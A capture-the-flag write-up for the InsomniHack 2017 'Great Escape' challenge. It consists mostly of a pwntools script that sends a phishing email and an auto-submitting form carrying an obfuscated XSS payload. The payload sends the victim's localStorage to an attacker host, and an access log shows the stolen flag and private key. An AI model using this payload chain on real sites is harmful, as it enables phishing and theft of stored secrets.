hacktracking: # InsomniHack teaser 2k17: The Great Escape - part 2 - forensics

# InsomniHack teaser 2k17: The Great Escape - part 2 - forensics - 200 pts

# ./certbot-auto

# cat phishing.py
from pwn import *

host = 'ssc.teaser.insomnihack.ch'
port = 25

r = remote(host, port)

expect = '(Ubuntu)'
line = 'ehlo ip-172-31-36-141.eu-west-1.compute.internal'
r.sendlineafter(expect, line)
expect = '250 SMTPUTF8'
line = 'mail FROM:<gr27@ssc.teaser.insomnihack.ch>'
r.sendlineafter(expect, line)
expect = 'Ok'
line = 'rcpt TO:<rogue@ssc.teaser.insomnihack.ch>'
r.sendlineafter(expect, line)
expect = 'Ok'
line = 'data'
r.sendlineafter(expect, line)
expect = '.<CR><LF>'
line = '''Content-Type: multipart/mixed; boundary="===============5398474817237612449=="
MIME-Version: 1.0
From: gr27@ssc.teaser.insomnihack.ch
To: rogue@ssc.teaser.insomnihack.ch
Date: Fri, 20 Jan 2017 11:51:27 +0000
Subject: Good links

--===============5398474817237612449==
Content-Type: text/plain; charset="us-ascii"
MIME-Version: 1.0
Content-Transfer-Encoding: 7bit

Hello Rogue,

https://thegreatescape2.ddns.net/links.html

GR-27

--===============5398474817237612449==--
.\r\n'''
r.sendlineafter(expect, line)

# cat /var/www/html/links.html
<html>
     <form id="1234" action="https://ssc.teaser.insomnihack.ch/api/user.php" method="post">
          <input name="action" value="login" />
   <input name="name" value="<img src='a' onerror='javascript:document.write(String.fromCharCode(60,115,99,114,105,112,116,62,118,97,114,32,100,97,116,97,32,61,32,39,39,59,102,111,114,32,40,118,97,114,32,107,101,121,32,105,110,32,108,111,99,97,108,83,116,111,114,97,103,101,41,123,32,100,97,116,97,32,43,61,32,108,111,99,97,108,83,116,111,114,97,103,101,46,103,101,116,73,116,101,109,40,107,101,121,41,125,118,97,114,32,104,116,116,112,32,61,32,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,104,116,116,112,46,111,112,101,110,40,39,71,69,84,39,44,32,39,104,116,116,112,115,58,47,47,116,104,101,103,114,101,97,116,101,115,99,97,112,101,50,46,100,100,110,115,46,110,101,116,47,103,101,116,46,104,116,109,108,63,108,115,61,39,32,43,32,100,97,116,97,44,32,116,114,117,101,41,59,104,116,116,112,46,115,101,110,100,40,41,59,60,47,115,99,114,105,112,116,62))'/>"/>
         <input name="password" value="tge2"/>
        </form>
</html>

<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.6.1/jquery.min.js"></script>
<script type="text/javascript">
  $(document).ready(function() {
       window.document.forms[0].submit();
         });
</script>

# python phishing.py
[+] Opening connection to ssc.teaser.insomnihack.ch on port 25: Done
[*] Closed connection to ssc.teaser.insomnihack.ch port 25

# tail -f /var/log/apache2/access.log
52.214.142.175 - - [29/Jan/2017:09:27:14 +0000] "GET /links.html HTTP/1.1" 200 4202 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0"
52.214.142.175 - - [29/Jan/2017:09:27:15 +0000] "GET /get.html?ls=INS{IhideMyVulnsWithCrypto}{"alg":"RSA-OAEP-256","d":"CFSPW_AU_cK07bOtdnzbj5MgBqdweDY04Ku-mHSrAIbDv3J_lHH-jCPQb5U2JR4v08eMXlz3AassULQr60rskdwjdPN7Nen15yRcRTsaoSyRTd2qM8O_U-K6Gy7Lvg_ld2HOlHNBBy2k8g8cP7cpjyy7Ebsk5MUNy_udx9aMs7497RaIrCFnpT7RztudkYBo_2Oy5xm6BcsV9059HBhbKbUqq6Ui9_BZ3H7sdwTqlYx3afVV5AgE61eEdWK7vK_yI65Ru_5_fOBWik7xf7fwPjf7COp1HfTZiFbCIWTUaXVe6ThfMoTdwT1wQ0wwuFdtpGTkk8d4XwGtDa8-_XbmIQ","dp":"hapJ7dlVsPvF9no_s-Nfnpv2dZ5a5_C2AyPo_-_mVi4-1a7HTkW9SyGg1KextCPYRAwQZ1wU3bL6P_4TjkrYiAAl-8Iq6moUqWuRY7G8vo3N_P3aBwjgyNTzk3eHfnUFP4QgGOooT2ZwyuDTDSbwKOesnD13q4U_vjtjcZaFU70","dq":"Ts_hwWPsLOjp-yJg0wbQEONeqbvNPLCChb5QJItXvUaL2JcN9muozrN1GZqu383-h8gZ-VUm3-CFU7OWeGYLa0PZlq1uGNvsdffgdNL3MYZ2KwMhXkwXKf45ePhx_ydiblYhb44cFtm0ffXKSPlvbyzLHvJ2_o8ggok0Lzu-weE","e":"AQAB","ext":true,"key_ops":["decrypt"],"kty":"RSA","n":"qx_U0OgHUPC6n4RcE_q1ONcEgKp4tcbLWeUIfrlRAcX64alQSpddAv98CHo2ziSBgi7tS-HwUsVlH06Nxaa0tx3SdM0cz95IkvjB_kqdPnHEwyx8iz5Gh8ZHP32ZoETBs2PzxTIcEOekm1qQnA0MTdvAAO0xcvuvhRM2YycRYfN860NsBCRrF25lZn9DTGBDnisCm0-xvElxAZ8gObWeJ1SZRgFRJwI14d11oa922drFp0ux4MHscls2tEjPV7eXdivjGYI-uzVX61fjyUdGxFeb8CAjxrzOmw4f1Aac7kqXwmF-eMq3AMKm2tArrIIjT4t2q2mP1FXImrNQ_vinVQ","p":"29_YD0m-NFoUTmst33E4p2VBDlCeQ1MJdr_7tO4ERF8aww0e8hu3jRq5PMHCEc8G8gA4q2kuXylIpaB5mWzcQplDDMgIDGupEnL_J0ynMcg-HUld8NDaya7mQWtLHvSEAoB-2MymBTJYaTwsvAYtTI8ruaqhMo4-cKjs5zQfmj0","q":"xz2B2WzMdesiDK7dzorVdJlBgIShj2cMRGwhXcSiWfbY2M4Y3DB_m8p5tdEUIU6g0oWbSfmaYF_MsQxijXRxxe17nuYssns2ue4hYm2xH4mTY6voeNhbOeu7LtOXepUWxN-5520suTvL74Lx9xwWrdeTGIF1_zECqbWRuFieSvk","qi":"VhY5UYLTv20Btpq4MlizFPSuuItbfmK61P0rqEXe-sYHTitMNDBOWDSwIqj4pHkDTFaOCG0o6z81MyVg_bmz2ODzkHDrJUeiOVSMISxlaeSRf2JhiVYMfXiWKJBGCP-PgWuHp5NwLwESZT3aZ0KBYSkE7jnfcttWbc0mYu1glWg"}{"alg":"RSA-OAEP-256","e":"AQAB","ext":true,"key_ops":["encrypt"],"kty":"RSA","n":"qx_U0OgHUPC6n4RcE_q1ONcEgKp4tcbLWeUIfrlRAcX64alQSpddAv98CHo2ziSBgi7tS-HwUsVlH06Nxaa0tx3SdM0cz95IkvjB_kqdPnHEwyx8iz5Gh8ZHP32ZoETBs2PzxTIcEOekm1qQnA0MTdvAAO0xcvuvhRM2YycRYfN860NsBCRrF25lZn9DTGBDnisCm0-xvElxAZ8gObWeJ1SZRgFRJwI14d11oa922drFp0ux4MHscls2tEjPV7eXdivjGYI-uzVX61fjyUdGxFeb8CAjxrzOmw4f1Aac7kqXwmF-eMq3AMKm2tArrIIjT4t2q2mP1FXImrNQ_vinVQ"}nullnullnullnullnullnull HTTP/1.1" 404 3761 "https://ssc.teaser.insomnihack.ch/api/user.php" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0"
# InsomniHack teaser 2k17: The Great Escape - part 2 - forensics - 200 pts

No comments:
